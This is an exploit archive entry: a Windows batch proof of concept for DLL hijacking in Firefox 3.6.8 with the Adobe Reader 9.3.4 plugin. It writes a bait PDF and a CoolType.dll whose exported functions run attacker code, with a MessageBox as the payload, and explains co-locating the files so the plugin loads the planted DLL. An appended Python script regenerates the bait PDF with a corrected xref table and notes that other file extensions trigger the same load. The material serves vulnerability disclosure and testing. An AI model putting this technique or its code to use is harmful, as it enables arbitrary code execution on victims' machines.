Mozilla Firefox 3.6.8 Adobe Reader Plugin 9.3.4.218 DLL Hijacking Exploit

2010-08-28T00:00:00
ID PACKETSTORM:93246
Type packetstorm
Reporter Rh0
Modified 2010-08-28T00:00:00

Description

`@echo off  
GOTO START  
  
* [*]  
* [*] Mozilla Firefox 3.6.8 Adobe Reader Plugin 9.3.4.218 DLL Hijacking Exploit (CoolType.dll)  
* [*]  
* [*] Author: Rh0 (Rh0[at]z1p.biz)  
* [*] Date: August 26, 2010  
* [*] Affected Software: Mozilla Firefox 3.6.8 with Adobe Reader Plugin 9.3.4.218  
* [*] Tested on: Windows XP Pro SP3 x86 En  
* [*] Description:  
*  
* Affected Extensions: .pdf .pdfxml .mars .fdf .xfdf .xdp .xfd  
*  
* When Firefox plugins are used, the necessary DLLs for the plugin to run  
* are searched in folders in the following order:  
*  
* mozilla firefox dir  
* windows system32 dir  
* windows system dir  
* windows dir  
* current dir <-- hijack possibility  
* plugin program dir  
*  
* Hence, depending on the opened file and on which DLLs the plugin loads, plugin DLLs can be hijacked.  
* Two examples for the Adobe Reader plugin:  
* CoolType.dll  
* authplay.dll (if the pdf contains an embedded swf file)  
*  
* This batch file example creates a minimal pdf file and CoolType.c, and  
* compiles the latter to CoolType.dll (gcc has to be installed).  
* When the pdf is opened with Firefox, CoolType.dll gets loaded and executed, provided both files are in the same directory.  
* So pdf files embedded in an html file could be used to hijack Adobe Reader DLLs.  
* For this exploit to work, Firefox and the Adobe Reader 9.3.4 plugin have to be installed.  
* To test the other extensions, simply change the extension of the pdf file and open it with Firefox.  
  
  
:START  
  
echo.  
echo [*]   
  
echo [*] Creating pdf file...  
  
REM PDF FILENAME  
set pdf=OpenwithFirefox.pdf  
  
echo %%PDF-1.4>"%pdf%"  
echo %%Çìó¢>>"%pdf%"  
echo 1 0 obj ^<^< /Type /Catalog /ViewerPreferences ^<^< /NonFullScreenPageMode /UseNone ^>^> /PageLayout /SinglePage /Pages 2 0 R /PageMode /UseNone ^>^> endobj>>"%pdf%"  
echo 2 0 obj ^<^< /Type /Pages /Kids [ 5 0 R ] /Resources 3 0 R /Count 1 ^>^> endobj>>"%pdf%"  
echo 3 0 obj ^<^< /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] ^>^> endobj>>"%pdf%"  
echo 4 0 obj ^<^< /Producer (PDF::API2 0.69 [linux]) ^>^> endobj>>"%pdf%"  
echo 5 0 obj ^<^< /Type /Page /Parent 2 0 R /Resources ^<^< /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] ^>^> ^>^> endobj>>"%pdf%"  
echo xref>>"%pdf%"  
echo 0 6 >>"%pdf%"  
echo 0000000000 65535 f>>"%pdf%"  
echo 0000000015 00000 n>>"%pdf%"  
echo 0000000164 00000 n>>"%pdf%"  
echo 0000000240 00000 n>>"%pdf%"  
echo 0000000309 00000 n>>"%pdf%"   
echo 0000000365 00000 n>>"%pdf%"   
echo trailer>>"%pdf%"  
echo ^<^< /Root 1 0 R /Size 6 /Info 4 0 R ^>^>>>"%pdf%"  
echo startxref>>"%pdf%"  
echo 477>>"%pdf%"  
echo %%%%EOF>>"%pdf%"  
  
echo [*] %pdf% created.  
  
echo [*]  
  
echo [*] Creating CoolType.c source...  
  
REM DLL SOURCE FILENAME  
set dllsrc=CoolType.c  
  
echo #include ^<windows.h^>>"%dllsrc%"  
echo #define DLLExport __declspec (dllexport)>>"%dllsrc%"  
echo int runme()>>"%dllsrc%"  
echo {>>"%dllsrc%"  
echo MessageBox(0, "Firefox with Adobe Reader Plugin DLL Hijacking", "Message from CoolType.dll", MB_OK);>>"%dllsrc%"  
echo return 0;>>"%dllsrc%"  
echo }>>"%dllsrc%"  
echo DLLExport void CTCleanup() { runme(); }>>"%dllsrc%"  
echo DLLExport void CTGetVersion() { runme(); }>>"%dllsrc%"  
echo DLLExport void CTInit() { runme(); }>>"%dllsrc%"  
echo [*] Done.  
  
echo [*] Compiling CoolType.dll...  
gcc -shared -o CoolType.dll CoolType.c  
  
echo [*] Done  
echo [*]  
echo [*] Copy "%pdf%" and CoolType.dll to the same   
echo [*] directory, open directory in windows explorer  
echo [*] and open "%pdf%" in Firefox.  
echo [*]  
pause  
`
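The batch file above hard-codes the xref offsets (15, 164, 240, 309, 365 and startxref 477). Those numbers are exact only for LF-terminated lines; cmd.exe's `echo` terminates every line with CRLF, so in the generated OpenwithFirefox.pdf every object sits one byte further along per preceding line and the table points into the wrong bytes. The file still opens because Adobe Reader rebuilds a cross-reference table that does not match the objects it finds, so the hijack is unaffected, but anyone generating PDFs for test cases should compute the table. The following Python script is an added example, not part of the original exploit or of any Adobe or Mozilla code: it writes the same five objects with a computed xref, then follows startxref, parses the table back and checks that every entry lands on `N 0 obj`. The object bodies are copied from the batch file; the function names, and the assumption that the four binary-comment characters after `%` are emitted by cmd.exe as single bytes, are mine.

```python
import re

# Object bodies in the order the batch file echoes them (object numbers 1..5).
OBJECTS = [
    b"<< /Type /Catalog /ViewerPreferences << /NonFullScreenPageMode /UseNone >> "
    b"/PageLayout /SinglePage /Pages 2 0 R /PageMode /UseNone >>",
    b"<< /Type /Pages /Kids [ 5 0 R ] /Resources 3 0 R /Count 1 >>",
    b"<< /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >>",
    b"<< /Producer (PDF::API2 0.69 [linux]) >>",
    b"<< /Type /Page /Parent 2 0 R /Resources "
    b"<< /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> >>",
]

# Offsets and startxref value hard-coded by the batch file, kept for comparison.
BATCH_OFFSETS = [15, 164, 240, 309, 365]
BATCH_STARTXREF = 477


def build_pdf(objects=OBJECTS, eol=b"\n"):
    """Serialise the objects with a computed xref table; eol=b"\\r\\n" reproduces cmd.exe echo output."""
    # The four bytes after '%' are the binary-marker comment the batch file writes as %Çìó¢
    # (assumed here to be emitted as single bytes by cmd.exe).
    out = bytearray(b"%PDF-1.4" + eol + b"%\xc7\xec\xf3\xa2" + eol)
    offsets = []
    for num, body in enumerate(objects, start=1):
        offsets.append(len(out))                       # byte offset of "N 0 obj"
        out += b"%d 0 obj " % num + body + b" endobj" + eol
    xref_pos = len(out)
    size = len(objects) + 1                            # +1 for the free entry of object 0
    out += b"xref" + eol + b"0 %d" % size + eol
    # Each xref entry must be exactly 20 bytes: 10-digit offset, SP, 5-digit generation, SP, f|n, 2-byte EOL.
    entry_eol = eol if len(eol) == 2 else b" " + eol
    out += b"0000000000 65535 f" + entry_eol
    for off in offsets:
        out += b"%010d 00000 n" % off + entry_eol
    out += b"trailer" + eol + b"<< /Root 1 0 R /Size %d /Info 4 0 R >>" % size + eol
    out += b"startxref" + eol + b"%d" % xref_pos + eol + b"%%EOF" + eol
    return bytes(out)


def check_xref(pdf):
    """Follow startxref, parse the table, return (xref_pos, [(objnum, offset, lands_on_object), ...])."""
    m = re.search(rb"startxref\r?\n(\d+)\r?\n%%EOF", pdf)
    if not m:
        raise ValueError("no startxref/%%EOF trailer")
    xref_pos = int(m.group(1))
    hdr = re.match(rb"xref\r?\n(\d+) (\d+) *\r?\n", pdf[xref_pos:])
    if not hdr:
        raise ValueError("startxref does not point at an xref table")
    first, count = int(hdr.group(1)), int(hdr.group(2))
    table = xref_pos + hdr.end()
    entries = []
    for i in range(count):
        e = pdf[table + 20 * i: table + 20 * (i + 1)]
        off, gen, kind = int(e[:10]), int(e[11:16]), e[17:18]
        if kind == b"n":
            ok = pdf[off:].startswith(b"%d %d obj" % (first + i, gen))
            entries.append((first + i, off, ok))
    return xref_pos, entries


def stale_offsets(pdf, claimed):
    """Object numbers (1-based order) whose claimed offset does not land on 'N 0 obj' in pdf."""
    return [n for n, off in enumerate(claimed, start=1)
            if not pdf[off:].startswith(b"%d 0 obj" % n)]


if __name__ == "__main__":
    lf, crlf = build_pdf(), build_pdf(eol=b"\r\n")
    print("LF   offsets:", [o for _, o, _ in check_xref(lf)[1]], "startxref", check_xref(lf)[0])
    print("CRLF offsets:", [o for _, o, _ in check_xref(crlf)[1]], "startxref", check_xref(crlf)[0])
    print("batch offsets stale in CRLF output for objects:", stale_offsets(crlf, BATCH_OFFSETS))
    with open("OpenwithFirefox.pdf", "wb") as f:   # same file name as the batch file uses
        f.write(crlf)
```

Run stand-alone, it prints the LF offsets (which reproduce the batch file's hard-coded numbers exactly), the CRLF offsets, and which of the batch file's entries are stale in CRLF output (all five), and writes an OpenwithFirefox.pdf whose table is consistent. Renaming that file to one of the other affected extensions exercises the same plugin association described above.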